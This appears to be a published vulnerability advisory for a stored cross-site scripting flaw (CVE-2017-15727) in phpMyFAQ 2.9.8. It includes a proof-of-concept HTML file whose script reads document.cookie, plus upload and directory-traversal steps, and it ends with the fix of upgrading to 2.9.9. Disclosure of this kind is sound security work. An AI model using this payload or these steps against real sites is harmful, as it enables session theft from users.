41 lines
No EOL
1 KiB
Text
41 lines
No EOL
1 KiB
Text
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
|
|
# Date: 28-9-2017
|
|
# Exploit Author: Nikhil Mittal (Payatu Labs)
|
|
# Vendor Homepage: http://www.phpmyfaq.de/
|
|
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
|
|
# Version: 2.9.8
|
|
# Tested on: MAC OS
|
|
# CVE : 2017-15727
|
|
|
|
1. Description
|
|
|
|
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.
|
|
|
|
2. Proof of concept
|
|
|
|
Exploit code
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>XSS EXPLOIT</title>
|
|
</head>
|
|
<body>
|
|
<script>confirm(document.cookie)</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
|
|
Steps to reproduce:
|
|
|
|
1. Create a user having limited access rights to attachment section
|
|
2. Goto http://localhost/phpmyfaq/admin/?action=editentry
|
|
2. Upload the exploit code with .html extension at the place of attachements
|
|
3. Access the file url generated at /phpmyfaq/attachments/<random_path>
|
|
4. Reach to last file using directory traversal and XSS will triage
|
|
|
|
3. Solution
|
|
|
|
Update to phpMyFAQ Version 2.9.9
|
|
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip |